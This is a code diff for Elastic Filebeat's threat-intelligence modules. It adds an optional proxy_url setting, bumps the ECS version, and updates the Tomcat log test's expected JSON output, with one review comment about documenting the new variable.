--- a/x-pack/filebeat/module/threatintel/abusemalware/manifest.yml +++ b/x-pack/filebeat/module/threatintel/abusemalware/manifest.yml @@ -10,6 +10,7 @@ var: - name: ssl - name: tags default: [threatintel-abusemalware, forwarded] + - name: proxy_url ingest_pipeline: - ingest/pipeline.yml diff --git a/x-pack/filebeat/module/threatintel/abuseurl/config/config.yml b/x-pack/filebeat/module/threatintel/abuseurl/config/config.yml index 96affa7da97..708643e734b 100644 --- a/x-pack/filebeat/module/threatintel/abuseurl/config/config.yml +++ b/x-pack/filebeat/module/threatintel/abuseurl/config/config.yml @@ -8,6 +8,9 @@ request.method: GET {{ if .ssl }} request.ssl: {{ .ssl | tojson }} {{ end }} +{{ if .proxy_url }} +request.proxy_url: {{ .proxy_url }} +{{ end }} request.url: {{ .url }} request.transforms: - set: @@ -41,4 +44,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.6.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/threatintel/abuseurl/manifest.yml b/x-pack/filebeat/module/threatintel/abuseurl/manifest.yml index 155e9b4ff3f..13b5e663c4a 100644 --- a/x-pack/filebeat/module/threatintel/abuseurl/manifest.yml +++ b/x-pack/filebeat/module/threatintel/abuseurl/manifest.yml @@ -10,6 +10,7 @@ var: - name: ssl - name: tags default: [threatintel-abuseurls, forwarded] + - name: proxy_url ingest_pipeline: - ingest/pipeline.yml diff --git a/x-pack/filebeat/module/threatintel/anomali/config/config.yml b/x-pack/filebeat/module/threatintel/anomali/config/config.yml index fd55b6e07c2..a063f6f14f9 100644 --- a/x-pack/filebeat/module/threatintel/anomali/config/config.yml +++ b/x-pack/filebeat/module/threatintel/anomali/config/config.yml @@ -14,6 +14,9 @@ request.method: GET {{ if .ssl }} request.ssl: {{ .ssl | tojson }} {{ end }} +{{ if .proxy_url }} +request.proxy_url: {{ .proxy_url }} +{{ end }} request.url: {{ .url }} request.redirect.forward_headers: true request.transforms: 
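Review bot: The abusemalware `manifest.yml` hunk declares `- name: proxy_url` with no default, and the two `_meta/docs.asciidoc` hunks in this commit only rename `var.initial_interval`, so the new variable appears to ship without user-facing documentation (it may be documented in a file outside this view). I would add a `var.proxy_url` entry to the module docs stating the expected URL form, and note there that proxy credentials are better supplied through a keystore reference such as `var.proxy_url: "${PROXY_URL}"` (constructed example) than written literally in the module config. The abuseurl, anomali, misp and otx manifests add the same variable.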
@@ -65,4 +68,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.6.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/threatintel/anomali/manifest.yml b/x-pack/filebeat/module/threatintel/anomali/manifest.yml index b7b87d8fe66..1087e00df8a 100644 --- a/x-pack/filebeat/module/threatintel/anomali/manifest.yml +++ b/x-pack/filebeat/module/threatintel/anomali/manifest.yml @@ -16,6 +16,7 @@ var: default: "https://otx.alienvault.com/api/v1/indicators/export" - name: tags default: [threatintel-anomali, forwarded] + - name: proxy_url ingest_pipeline: - ingest/pipeline.yml diff --git a/x-pack/filebeat/module/threatintel/misp/config/config.yml b/x-pack/filebeat/module/threatintel/misp/config/config.yml index e28c6c1d9a7..df669cf6a0e 100644 --- a/x-pack/filebeat/module/threatintel/misp/config/config.yml +++ b/x-pack/filebeat/module/threatintel/misp/config/config.yml @@ -8,6 +8,9 @@ request.method: POST {{ if .ssl }} request.ssl: {{ .ssl | tojson }} {{ end }} +{{ if .proxy_url }} +request.proxy_url: {{ .proxy_url }} +{{ end }} request.url: {{ .url }} request.body: limit: 100 @@ -71,4 +74,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.6.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/threatintel/misp/manifest.yml b/x-pack/filebeat/module/threatintel/misp/manifest.yml index a39c1fe4496..41443c01df8 100644 --- a/x-pack/filebeat/module/threatintel/misp/manifest.yml +++ b/x-pack/filebeat/module/threatintel/misp/manifest.yml @@ -14,6 +14,7 @@ var: default: "https://localhost/events/restSearch" - name: tags default: [threatintel-misp, forwarded] + - name: proxy_url ingest_pipeline: - ingest/pipeline.yml diff --git a/x-pack/filebeat/module/threatintel/otx/config/config.yml b/x-pack/filebeat/module/threatintel/otx/config/config.yml index 252c64a21f4..ee5e9e210f3 100644 --- a/x-pack/filebeat/module/threatintel/otx/config/config.yml +++ b/x-pack/filebeat/module/threatintel/otx/config/config.yml 
@@ -8,6 +8,9 @@ request.method: GET {{ if .ssl }} request.ssl: {{ .ssl | tojson }} {{ end }} +{{ if .proxy_url }} +request.proxy_url: {{ .proxy_url }} +{{ end }} {{ if .http_client_timeout }} request.timeout: {{ .http_client_timeout }} {{ end }} @@ -66,4 +69,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.6.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/threatintel/otx/manifest.yml b/x-pack/filebeat/module/threatintel/otx/manifest.yml index c17efa499e9..0fdefa51d76 100644 --- a/x-pack/filebeat/module/threatintel/otx/manifest.yml +++ b/x-pack/filebeat/module/threatintel/otx/manifest.yml @@ -19,6 +19,7 @@ var: default: "https://otx.alienvault.com/api/v1/indicators/export" - name: tags default: [threatintel-otx, forwarded] + - name: proxy_url ingest_pipeline: - ingest/pipeline.yml diff --git a/x-pack/filebeat/module/tomcat/log/config/input.yml b/x-pack/filebeat/module/tomcat/log/config/input.yml index d8c776349f3..85e40ec455d 100644 --- a/x-pack/filebeat/module/tomcat/log/config/input.yml +++ b/x-pack/filebeat/module/tomcat/log/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/tomcat/log/test/generated.log-expected.json b/x-pack/filebeat/module/tomcat/log/test/generated.log-expected.json index 12ef13d2390..e73c0f86cd2 100644 --- a/x-pack/filebeat/module/tomcat/log/test/generated.log-expected.json +++ b/x-pack/filebeat/module/tomcat/log/test/generated.log-expected.json @@ -15,9 +15,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ + "mail.example.net", "example.com", - "https://example.com/illumqui/ventore.html?min=ite#utl", - "mail.example.net" + "https://example.com/illumqui/ventore.html?min=ite#utl" ], "related.ip": [ "10.251.224.219" 
@@ -53,6 +53,7 @@ "url.top_level_domain": "com", "user.name": "rci", "user_agent.device.name": "G8142", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; G8142) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -76,9 +77,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ + "https://www5.example.net/mdolo/mqui.htm?sumdo=litesse#orev", "www5.example.net", - "mail.example.com", - "https://www5.example.net/mdolo/mqui.htm?sumdo=litesse#orev" + "mail.example.com" ], "related.ip": [ "10.196.153.12" @@ -115,6 +116,7 @@ "url.top_level_domain": "net", "user.name": "abo", "user_agent.device.name": "Generic Smartphone", + "user_agent.device.type": "Other", "user_agent.name": "Opera Mini", "user_agent.original": "Opera/9.80 (Series 60; Opera Mini/7.1.32444/174.101; U; ru) Presto/2.12.423 Version/12.16", "user_agent.os.name": "Symbian OS", @@ -137,9 +139,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ + "www.example.com", "internal.example.com", "https://internal.example.com/tetur/idolor.html?ntex=eius#luptat", - "www.example.com", "ctetur5806.api.home" ], "related.ip": [ @@ -179,6 +181,7 @@ "url.top_level_domain": "com", "user.name": "enatus", "user_agent.device.name": "Samsung SM-A260G", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile WebView", "user_agent.original": "Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36", "user_agent.os.full": "Android 8.1.0", 
@@ -202,9 +205,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "https://www5.example.org/nci/ofdeFin.gif?amco=exe#iatu", "mail.example.com", - "www5.example.org" + "www5.example.org", + "https://www5.example.org/nci/ofdeFin.gif?amco=exe#iatu" ], "related.ip": [ "10.196.118.192" @@ -241,6 +244,7 @@ "url.top_level_domain": "org", "user.name": "tur", "user_agent.device.name": "5024D_RU", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; 5024D_RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36 YaApp_Android/10.61 YaSearchBrowser/10.61", "user_agent.os.full": "Android 9", @@ -265,8 +269,8 @@ "observer.vendor": "Apache", "related.hosts": [ "internal.example.com", - "internal.example.net", - "https://internal.example.com/aqui/radipis.jpg?llumd=enatuse#magn" + "https://internal.example.com/aqui/radipis.jpg?llumd=enatuse#magn", + "internal.example.net" ], "related.ip": [ "10.246.209.145" @@ -303,6 +307,7 @@ "url.top_level_domain": "com", "user.name": "llu", "user_agent.device.name": "VS996", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 8.0.0; VS996) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 8.0.0", @@ -327,8 +332,8 @@ "observer.vendor": "Apache", "related.hosts": [ "internal.example.com", - "www5.example.org", - "https://internal.example.com/omnis/antium.txt?lupta=iusmodt#doloreeu" + "https://internal.example.com/omnis/antium.txt?lupta=iusmodt#doloreeu", + "www5.example.org" ], "related.ip": [ "10.114.191.225" 
@@ -365,6 +370,7 @@ "url.top_level_domain": "com", "user.name": "tempo", "user_agent.device.name": "QMobile X700 PRO II", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; QMobile X700 PRO II) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36", "user_agent.os.full": "Android 6.0", @@ -389,9 +395,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ + "api.example.com", "https://www5.example.net/uidolore/niamqu.gif?iat=tevelit#nsequat", "www5.example.net", - "api.example.com", "erep2696.www.home" ], "related.ip": [ @@ -431,6 +437,7 @@ "url.top_level_domain": "net", "user.name": "liqu", "user_agent.device.name": "Micromax P410i", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36", "user_agent.os.full": "Android 4.1.2", @@ -455,8 +462,8 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "https://www.example.org/idexea/riat.txt?tvol=moll#tatione", "mail.example.org", + "https://www.example.org/idexea/riat.txt?tvol=moll#tatione", "www.example.org", "mUt2398.invalid" ], @@ -497,6 +504,7 @@ "url.top_level_domain": "org", "user.name": "ugits", "user_agent.device.name": "Lenovo A2016a40 ", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; Lenovo A2016a40 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.106 Mobile Safari/537.36 YaApp_Android/10.30 YaSearchBrowser/10.30", "user_agent.os.full": "Android 6.0", 
@@ -521,8 +529,8 @@ "observer.vendor": "Apache", "related.hosts": [ "example.org", - "api.example.org", - "https://api.example.org/toccae/tatno.gif?taliqu=temUten#ccusan" + "https://api.example.org/toccae/tatno.gif?taliqu=temUten#ccusan", + "api.example.org" ], "related.ip": [ "10.182.166.181" @@ -559,6 +567,7 @@ "url.top_level_domain": "org", "user.name": "mol", "user_agent.device.name": "Micromax P410i", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36", "user_agent.os.full": "Android 4.1.2", @@ -582,8 +591,8 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "mail.example.net", "internal.example.com", + "mail.example.net", "https://mail.example.net/atuse/ddoeiu.gif?idolore=onse#liq" ], "related.ip": [ @@ -621,6 +630,7 @@ "url.top_level_domain": "net", "user.name": "quu", "user_agent.device.name": "Generic Smartphone", + "user_agent.device.type": "Other", "user_agent.name": "Opera Mini", "user_agent.original": "Opera/9.80 (Series 60; Opera Mini/7.1.32444/174.101; U; ru) Presto/2.12.423 Version/12.16", "user_agent.os.name": "Symbian OS", @@ -643,9 +653,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "https://example.com/idestla/Nemoeni.htm?taed=lup#remeumf", "mail.example.net", "example.com", + "https://example.com/idestla/Nemoeni.htm?taed=lup#remeumf", "siuta2896.www.localhost" ], "related.ip": [ @@ -684,6 +694,7 @@ "url.top_level_domain": "com", "user.name": "nsequu", "user_agent.device.name": "ZTE BLADE V7", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; ZTE BLADE V7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 6.0", 
@@ -749,6 +760,7 @@ "url.top_level_domain": "net", "user.name": "lapariat", "user_agent.device.name": "Asus X01BDA", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; ASUS_X01BDA) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Mobile Safari/537.36", "user_agent.os.full": "Android 10", @@ -815,6 +827,7 @@ "url.top_level_domain": "com", "user.name": "des", "user_agent.device.name": "Android", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 5.1.1; Android Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/9.80 YaSearchBrowser/9.80", "user_agent.os.full": "Android 5.1.1", @@ -838,9 +851,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "example.net", + "www.example.org", "https://example.net/tion/eataev.htm?uiineavo=tisetq#irati", - "www.example.org" + "example.net" ], "related.ip": [ "10.57.170.140" @@ -876,6 +889,7 @@ "url.top_level_domain": "net", "user.name": "onse", "user_agent.device.name": "QMobile X700 PRO II", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; QMobile X700 PRO II) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36", "user_agent.os.full": "Android 6.0", @@ -899,9 +913,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "internal.example.net", + "https://internal.example.com/isno/taliq.htm?nnu=dolo#Loremip", "internal.example.com", - "https://internal.example.com/isno/taliq.htm?nnu=dolo#Loremip" + "internal.example.net" ], "related.ip": [ "10.33.153.47" 
@@ -938,6 +952,7 @@ "url.top_level_domain": "com", "user.name": "atquovo", "user_agent.device.name": "STK-L21", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; STK-L21 Build/HUAWEISTK-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91", "user_agent.os.full": "Android 10", @@ -1003,6 +1018,7 @@ "url.top_level_domain": "net", "user.name": "tat", "user_agent.device.name": "Notepad_K10", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; Notepad_K10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Safari/537.36", "user_agent.os.full": "Android 9", @@ -1027,8 +1043,8 @@ "observer.vendor": "Apache", "related.hosts": [ "example.com", - "https://internal.example.com/oidentsu/atiset.jpg?ntor=lpaqui#sitame", - "internal.example.com" + "internal.example.com", + "https://internal.example.com/oidentsu/atiset.jpg?ntor=lpaqui#sitame" ], "related.ip": [ "10.202.194.67" @@ -1065,6 +1081,7 @@ "url.top_level_domain": "com", "user.name": "ittenbyC", "user_agent.device.name": "ZTE Blade V1000RU", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; ZTE Blade V1000RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91", "user_agent.os.full": "Android 9", @@ -1131,6 +1148,7 @@ "url.top_level_domain": "com", "user.name": "modocon", "user_agent.device.name": "Samsung GT-P3100 ", + "user_agent.device.type": "Tablet", "user_agent.name": "Android", "user_agent.original": "Mozilla/5.0 (Linux; U; Android 4.0.3; es-us; GT-P3100 Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30", "user_agent.os.full": "Android 4.0.3", 
@@ -1155,8 +1173,8 @@ "observer.vendor": "Apache", "related.hosts": [ "internal.example.net", - "www5.example.org", - "https://www5.example.org/eriamea/amre.htm?magni=pisciv#iquidex" + "https://www5.example.org/eriamea/amre.htm?magni=pisciv#iquidex", + "www5.example.org" ], "related.ip": [ "10.52.186.29" @@ -1193,6 +1211,7 @@ "url.top_level_domain": "org", "user.name": "doloreme", "user_agent.device.name": "VS996", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 8.0.0; VS996) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 8.0.0", @@ -1217,8 +1236,8 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "example.net", "www.example.org", + "example.net", "https://www.example.org/iutali/fdeFi.jpg?liquide=etdol#uela", "oquisqu2937.mail.domain" ], @@ -1259,6 +1278,7 @@ "url.top_level_domain": "org", "user.name": "olor", "user_agent.device.name": "iPhone", + "user_agent.device.type": "Phone", "user_agent.name": "Facebook", "user_agent.original": "Mozilla/5.0 (iPhone; CPU iPhone OS 13_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 LightSpeed [FBAN/MessengerLiteForiOS;FBAV/266.0.0.32.114;FBBV/216059178;FBDV/iPhone10,6;FBMD/iPhone;FBSN/iOS;FBSV/13.4.1;FBSS/3;FBCR/;FBID/phone;FBLC/en_US;FBOP/0]", "user_agent.os.full": "iOS 13.4.1", @@ -1283,9 +1303,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ + "mail.example.net", "api.example.org", "https://mail.example.net/itatione/isnis.html?oluptate=issus#osamn", - "mail.example.net", "dolore1287.internal.lan" ], "related.ip": [ 
@@ -1325,6 +1345,7 @@ "url.top_level_domain": "net", "user.name": "sin", "user_agent.device.name": "Samsung SM-A260G", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile WebView", "user_agent.original": "Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36", "user_agent.os.full": "Android 8.1.0", @@ -1349,8 +1370,8 @@ "observer.vendor": "Apache", "related.hosts": [ "www5.example.org", - "www.example.org", - "https://www.example.org/emvel/tmollita.htm?numqua=veni#eveli" + "https://www.example.org/emvel/tmollita.htm?numqua=veni#eveli", + "www.example.org" ], "related.ip": [ "10.62.191.18" @@ -1387,6 +1408,7 @@ "url.top_level_domain": "org", "user.name": "orporiss", "user_agent.device.name": "STK-L21", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; STK-L21 Build/HUAWEISTK-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91", "user_agent.os.full": "Android 10", @@ -1410,8 +1432,8 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "example.org", "example.net", + "example.org", "https://example.net/nisi/dant.txt?ecte=tinvolu#iurer" ], "related.ip": [ @@ -1448,6 +1470,7 @@ "url.top_level_domain": "net", "user.name": "utlabor", "user_agent.device.name": "Meizu M6", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 7.0; MEIZU M6 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Mobile Safari/537.36 YaApp_Android/10.30 YaSearchBrowser/10.30", "user_agent.os.full": "Android 7.0", 
@@ -1471,9 +1494,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ + "example.com", "https://internal.example.com/sintocc/tlabor.txt?tDuisaut=oinBC#quameius", - "internal.example.com", - "example.com" + "internal.example.com" ], "related.ip": [ "10.155.230.17" @@ -1510,6 +1533,7 @@ "url.top_level_domain": "com", "user.name": "ionevo", "user_agent.device.name": "POCOPHONE F1", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; POCOPHONE F1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -1534,9 +1558,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "https://example.net/officiad/itam.html?madmi=tur#roi", - "mail.example.net", "example.net", + "mail.example.net", + "https://example.net/officiad/itam.html?madmi=tur#roi", "ide2767.www5.local" ], "related.ip": [ @@ -1575,6 +1599,7 @@ "url.top_level_domain": "net", "user.name": "tenbyCi", "user_agent.device.name": "G8142", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; G8142) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -1641,6 +1666,7 @@ "url.top_level_domain": "org", "user.name": "vita", "user_agent.device.name": "Samsung SM-A260G", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile WebView", "user_agent.original": "Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36", "user_agent.os.full": "Android 8.1.0", 
@@ -1664,9 +1690,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "https://api.example.net/roid/inibusB.jpg?Nemoenim=squirati#Sedutp", "api.example.net", - "example.com" + "example.com", + "https://api.example.net/roid/inibusB.jpg?Nemoenim=squirati#Sedutp" ], "related.ip": [ "10.99.0.226" @@ -1703,6 +1729,7 @@ "url.top_level_domain": "net", "user.name": "uidol", "user_agent.device.name": "Pixel 3", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; Pixel 3 Build/PD1A.180720.030) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -1726,8 +1753,8 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "api.example.org", "www.example.net", + "api.example.org", "https://www.example.net/str/idolore.txt?eetdolo=cteturad#untut" ], "related.ip": [ @@ -1765,6 +1792,7 @@ "url.top_level_domain": "net", "user.name": "minimav", "user_agent.device.name": "QMobile X700 PRO II", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; QMobile X700 PRO II) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36", "user_agent.os.full": "Android 6.0", @@ -1790,8 +1818,8 @@ "observer.vendor": "Apache", "related.hosts": [ "https://mail.example.org/iscinge/ofdeFini.jpg?molli=velitse#oditem", - "www.example.org", "mail.example.org", + "www.example.org", "idunt4707.host" ], "related.ip": [ 
@@ -1831,6 +1859,7 @@ "url.top_level_domain": "org", "user.name": "isnost", "user_agent.device.name": "Lenovo A2016a40 ", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; Lenovo A2016a40 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.106 Mobile Safari/537.36 YaApp_Android/10.30 YaSearchBrowser/10.30", "user_agent.os.full": "Android 6.0", @@ -1893,6 +1922,7 @@ "url.top_level_domain": "org", "user.name": "luptate", "user_agent.device.name": "ZTE Blade V1000RU", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; ZTE Blade V1000RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91", "user_agent.os.full": "Android 9", @@ -1918,8 +1948,8 @@ "observer.vendor": "Apache", "related.hosts": [ "example.com", - "example.org", "https://example.com/mexe/its.htm?ice=oles#edic", + "example.org", "emquia1497.www5.lan" ], "related.ip": [ @@ -1958,6 +1988,7 @@ "url.top_level_domain": "com", "user.name": "siut", "user_agent.device.name": "Notepad_K10", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; Notepad_K10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Safari/537.36", "user_agent.os.full": "Android 9", @@ -2024,6 +2055,7 @@ "url.top_level_domain": "com", "user.name": "tconsect", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "mobmail android 2.1.3.3150" }, @@ -2044,8 +2076,8 @@ "observer.vendor": "Apache", "related.hosts": [ "https://www.example.org/xeacomm/cinge.txt?apariat=vitaedi#lorsita", - "www.example.org", - "internal.example.com" + "internal.example.com", + "www.example.org" ], "related.ip": [ "10.10.213.83" 
@@ -2082,6 +2114,7 @@ "url.top_level_domain": "org", "user.name": "psum", "user_agent.device.name": "iPhone", + "user_agent.device.type": "Phone", "user_agent.name": "Facebook", "user_agent.original": "Mozilla/5.0 (iPhone; CPU iPhone OS 13_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 LightSpeed [FBAN/MessengerLiteForiOS;FBAV/266.0.0.32.114;FBBV/216059178;FBDV/iPhone10,6;FBMD/iPhone;FBSN/iOS;FBSV/13.4.1;FBSS/3;FBCR/;FBID/phone;FBLC/en_US;FBOP/0]", "user_agent.os.full": "iOS 13.4.1", @@ -2106,9 +2139,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ + "https://api.example.org/texpli/exeacom.jpg?rita=esseci#tametcon", "api.example.org", "mail.example.net", - "https://api.example.org/texpli/exeacom.jpg?rita=esseci#tametcon", "aboreetd5461.host" ], "related.ip": [ @@ -2148,6 +2181,7 @@ "url.top_level_domain": "org", "user.name": "urv", "user_agent.device.name": "iPhone", + "user_agent.device.type": "Phone", "user_agent.name": "Facebook", "user_agent.original": "Mozilla/5.0 (iPhone; CPU iPhone OS 13_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 LightSpeed [FBAN/MessengerLiteForiOS;FBAV/266.0.0.32.114;FBBV/216059178;FBDV/iPhone10,6;FBMD/iPhone;FBSN/iOS;FBSV/13.4.1;FBSS/3;FBCR/;FBID/phone;FBLC/en_US;FBOP/0]", "user_agent.os.full": "iOS 13.4.1", @@ -2172,8 +2206,8 @@ "observer.vendor": "Apache", "related.hosts": [ "api.example.net", - "https://api.example.net/ibusBon/ven.gif?nsequat=doloreme#dun", - "www5.example.org" + "www5.example.org", + "https://api.example.net/ibusBon/ven.gif?nsequat=doloreme#dun" ], "related.ip": [ "10.19.17.202" @@ -2210,6 +2244,7 @@ "url.top_level_domain": "net", "user.name": "mve", "user_agent.device.name": "G8142", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; G8142) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", 
